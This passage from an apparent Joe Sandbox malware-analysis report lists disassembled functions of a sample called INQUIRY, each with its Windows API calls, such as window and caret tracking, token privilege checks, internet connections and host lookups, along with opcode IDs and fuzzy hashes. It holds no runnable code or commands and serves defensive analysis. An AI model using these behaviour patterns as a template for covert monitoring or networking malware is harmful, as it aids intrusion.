                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00A4628D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: d89cc2993d7f0b406cda77a5790b3a7864bb5afa1c210acd8581fe5029486e59
                                                                                              • Instruction ID: 08d8dfa4cec94e88460abcdc01afad9947f8b2eabb5d8b720fcc8db6472f3105
                                                                                              • Opcode Fuzzy Hash: d89cc2993d7f0b406cda77a5790b3a7864bb5afa1c210acd8581fe5029486e59
                                                                                              • Instruction Fuzzy Hash: 3831D035A04246BFDF218F69CC44BAA7BB9FF82310F154129F824971A1DBB0D950DB92
                                                                                              Function 00A94EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 00A94F02
                                                                                                • Part of subcall function 00A73641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A7365B
                                                                                                • Part of subcall function 00A73641: GetCurrentThreadId.KERNEL32 ref: 00A73662
                                                                                                • Part of subcall function 00A73641: AttachThreadInput.USER32(00000000,?,00A75005), ref: 00A73669
                                                                                              • GetCaretPos.USER32(?), ref: 00A94F13
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00A94F4E
                                                                                              • GetForegroundWindow.USER32 ref: 00A94F54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 61dd444c9deca450103db792e00bad85f2783cb968ca4024d5288caa0c0f00cd
                                                                                              • Instruction ID: b84da4c51c5eac400c768802eb7b16a5fd8b7304ce2f17705829ffe6fd88c51e
                                                                                              • Opcode Fuzzy Hash: 61dd444c9deca450103db792e00bad85f2783cb968ca4024d5288caa0c0f00cd
                                                                                              • Instruction Fuzzy Hash: 66310B72E00108AFDB00EFA5C9959EFB7F9EF99300F10406AE415E7241EA75AE45CBA0
                                                                                              Function 00A9C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • GetCursorPos.USER32(?), ref: 00A9C4D2
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00A4B9AB,?,?,?,?,?), ref: 00A9C4E7
                                                                                              • GetCursorPos.USER32(?), ref: 00A9C534
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00A4B9AB,?,?,?), ref: 00A9C56E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2864067406-0
                                                                                              • Opcode ID: 5fee8155ac1608bab45abc6a809fbbe270da9c10b47e79320dfe8e1f09beaba5
                                                                                              • Instruction ID: b10f465ffd712a8513c1ebefa7f9c045df0614b610abfcc85d8df97202cc6d6b
                                                                                              • Opcode Fuzzy Hash: 5fee8155ac1608bab45abc6a809fbbe270da9c10b47e79320dfe8e1f09beaba5
                                                                                              • Instruction Fuzzy Hash: 1731A235700458AFCF15CF98C858EEA7BF5EB49320F45406AF9058B261CB31AD51EBA4
                                                                                              Function 00A68656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A68121
                                                                                                • Part of subcall function 00A6810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A6812B
                                                                                                • Part of subcall function 00A6810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A6813A
                                                                                                • Part of subcall function 00A6810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68141
                                                                                                • Part of subcall function 00A6810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A68157
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00A686A3
                                                                                              • _memcmp.LIBCMT ref: 00A686C6
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A686FC
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A68703
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 1592001646-0
                                                                                              • Opcode ID: 2d6c53835c6c80cf1b4953cf8f0e5f0ababa5a0ea3f58af9390fe3b30776c771
                                                                                              • Instruction ID: fab187e302ca2137f01e0845658fa888cf00d08eb3463971b285690ccd8b543a
                                                                                              • Opcode Fuzzy Hash: 2d6c53835c6c80cf1b4953cf8f0e5f0ababa5a0ea3f58af9390fe3b30776c771
                                                                                              • Instruction Fuzzy Hash: 3321AF71E40109EFDB10DFA4CA49BEEB7B9EF44304F158259E854AB240EB75AE05CB90
                                                                                              Function 00A3098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __setmode.LIBCMT ref: 00A309AE
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50
                                                                                              • _fprintf.LIBCMT ref: 00A309E5
                                                                                              • OutputDebugStringW.KERNEL32(?), ref: 00A65DBB
                                                                                                • Part of subcall function 00A34AAA: _flsall.LIBCMT ref: 00A34AC3
                                                                                              • __setmode.LIBCMT ref: 00A30A1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                              • String ID:
                                                                                              • API String ID: 521402451-0
                                                                                              • Opcode ID: bcfe6cf60913cd146d7ffe4af53abd1074388a190298ab8704ccba8a21e2ec90
                                                                                              • Instruction ID: 547987faa929ab84ea18a4552c5bc6b9965f7c23e054f1587b788c19210f14b0
                                                                                              • Opcode Fuzzy Hash: bcfe6cf60913cd146d7ffe4af53abd1074388a190298ab8704ccba8a21e2ec90
                                                                                              • Instruction Fuzzy Hash: 27112431D04204BFDB08B7B4AD4B9FE77AC9F89360F244056F105A7182EF20698687A5
                                                                                              Function 00A81767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A817A3
                                                                                                • Part of subcall function 00A8182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A8184C
                                                                                                • Part of subcall function 00A8182D: InternetCloseHandle.WININET(00000000), ref: 00A818E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1463438336-0
                                                                                              • Opcode ID: ed9840ebffcdf236d7d286ef599aea11c45517cf2905061f5e98537be5bfa7a5
                                                                                              • Instruction ID: 59dc9a53df7a7a624d0324e0bbe5f3b0041c8e1a8f2a258d8ee15e60bc5fd77c
                                                                                              • Opcode Fuzzy Hash: ed9840ebffcdf236d7d286ef599aea11c45517cf2905061f5e98537be5bfa7a5
                                                                                              • Instruction Fuzzy Hash: 1F219335200605BFEB12AFA0DC41FBABBADFF48711F10402EFA55D6650DB75D8229BA0
                                                                                              Function 00A73A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(?,00A9FAC0), ref: 00A73A64
                                                                                              • GetLastError.KERNEL32 ref: 00A73A73
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A73A82
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A9FAC0), ref: 00A73ADF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2267087916-0
                                                                                              • Opcode ID: 2731abb5a874c4167fcacca3c49d51656d6e127bc1e50cb1e458b09ef7a000ad
                                                                                              • Instruction ID: fa1080210a607fd43a63f0d2b0ac80fc7593eab683086345e7181b3dc0a24e21
                                                                                              • Opcode Fuzzy Hash: 2731abb5a874c4167fcacca3c49d51656d6e127bc1e50cb1e458b09ef7a000ad
                                                                                              • Instruction Fuzzy Hash: 822176755092019F8710DF24CD428AE77E8AE553A4F14CA19F49DC7291DB31DE46DB42
                                                                                              Function 00A6DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A6F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?), ref: 00A6F0CB
                                                                                                • Part of subcall function 00A6F0BC: lstrcpyW.KERNEL32(00000000,?,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6F0F1
                                                                                                • Part of subcall function 00A6F0BC: lstrcmpiW.KERNEL32(00000000,?,00A6DCD3,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?), ref: 00A6F122
                                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DCEC
                                                                                              • lstrcpyW.KERNEL32(00000000,?,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DD12
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A6EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00A6DD46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 4031866154-3896280584
                                                                                              • Opcode ID: 6a245c5939b80ccad500b6f31496779a20aaa50fbc2121ee62cf8cb49b936007
                                                                                              • Instruction ID: 1095ea73afd2cf2057c15915e8fa70a216c48a9d50f6bd9d156a666c0f0bf6b3
                                                                                              • Opcode Fuzzy Hash: 6a245c5939b80ccad500b6f31496779a20aaa50fbc2121ee62cf8cb49b936007
                                                                                              • Instruction Fuzzy Hash: D611BB3A200305EFCB25AF74D845D7A77B8FF46390B50812AF906CB2A0EB729851C7E0
                                                                                              Function 00A450E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00A45101
                                                                                                • Part of subcall function 00A3571C: __FF_MSGBANNER.LIBCMT ref: 00A35733
                                                                                                • Part of subcall function 00A3571C: __NMSG_WRITE.LIBCMT ref: 00A3573A
                                                                                                • Part of subcall function 00A3571C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: dbb302f7233f125a06da9070d2e7ee6d45884e0727b1be2f12d5f9e714150162
                                                                                              • Instruction ID: 94bd49a237dcfdccf037e518afdb1d40b410335d5925986e79b0a592518869d6
                                                                                              • Opcode Fuzzy Hash: dbb302f7233f125a06da9070d2e7ee6d45884e0727b1be2f12d5f9e714150162
                                                                                              • Instruction Fuzzy Hash: 6F113676D00B06AFCF313FB8FD45B6E37989F843A0F20062AF9059A152DF3488418780
                                                                                              Function 00A144A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00A144CF
                                                                                                • Part of subcall function 00A1407C: _memset.LIBCMT ref: 00A140FC
                                                                                                • Part of subcall function 00A1407C: _wcscpy.LIBCMT ref: 00A14150
                                                                                                • Part of subcall function 00A1407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A14160
                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00A14524
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A14533
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A4D4B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1378193009-0
                                                                                              • Opcode ID: 26db035487b335c52f703e16a2ff40839c271b6180ada9cae30ea482fe9bc8a8
                                                                                              • Instruction ID: 608d60a995641b6a51df89953345d54271d6b71da93b1ec724cd682584562a2a
                                                                                              • Opcode Fuzzy Hash: 26db035487b335c52f703e16a2ff40839c271b6180ada9cae30ea482fe9bc8a8
                                                                                              • Instruction Fuzzy Hash: 39210474904784AFE732CB688849BE6BBECAF45314F04009EE68E9A281C7742EC5CB41
                                                                                              Function 00A86369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00A77896,?,?,00000000), ref: 00A15A2C
                                                                                                • Part of subcall function 00A15A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00A77896,?,?,00000000,?,?), ref: 00A15A50
                                                                                              • gethostbyname.WSOCK32(?,?,?), ref: 00A86399
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A863A4
                                                                                              • _memmove.LIBCMT ref: 00A863D1
                                                                                              • inet_ntoa.WSOCK32(?), ref: 00A863DC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                              • String ID:
                                                                                              • API String ID: 1504782959-0
                                                                                              • Opcode ID: 2514d5d746aff9a976f4cca25cd9d281993a50427b7ba44e988baa8481daf205
                                                                                              • Instruction ID: 93f68a2ef2110335649166461a8793158c1a8a2395347589754d1cb7e0c086f1
                                                                                              • Opcode Fuzzy Hash: 2514d5d746aff9a976f4cca25cd9d281993a50427b7ba44e988baa8481daf205
                                                                                              • Instruction Fuzzy Hash: 18112B36A00109EFCF04FBA4DE96DEEB7B9AF48310B144065F506A7261DB30AE55DBA1
                                                                                              Function 00A68B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00A68B61
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68B73
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68B89
                                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A68BA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 74ba6cfb9bbaf1efd52a874c1f615f27b706e037b6975ad12455425602987e7f
                                                                                              • Instruction ID: c439ce7a74d534709b871afa99f18328110973fb18eb7cca9cea2b0d6e89bef0
                                                                                              • Opcode Fuzzy Hash: 74ba6cfb9bbaf1efd52a874c1f615f27b706e037b6975ad12455425602987e7f
                                                                                              • Instruction Fuzzy Hash: 02114879900218FFEB10DFA5CC84FADBBB8FB48310F2041A5EA00B7290DA716E11DB94
                                                                                              Function 00A11290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • DefDlgProcW.USER32(?,00000020,?), ref: 00A112D8
                                                                                              • GetClientRect.USER32(?,?), ref: 00A4B5FB
                                                                                              • GetCursorPos.USER32(?), ref: 00A4B605
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A4B610
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 4127811313-0
                                                                                              • Opcode ID: f94f97d78c060c3d2224f5d5852b9dd109ea93d6e5e92a4338011b3c1929331d
                                                                                              • Instruction ID: 4bbd9bac9bf831f39e6f03e580ba88515304499c9845b3b00ed446991a58a0bc
                                                                                              • Opcode Fuzzy Hash: f94f97d78c060c3d2224f5d5852b9dd109ea93d6e5e92a4338011b3c1929331d
                                                                                              • Instruction Fuzzy Hash: DA113A35A01159EFCF10EFA8D989DEE77B8EB05301F500466FA01E7240CB34BA929BA5
                                                                                              Function 00A71142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A7115F
                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A71184
                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A7118E
                                                                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00A6FCED,?,00A70D40,?,00008000), ref: 00A711C1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
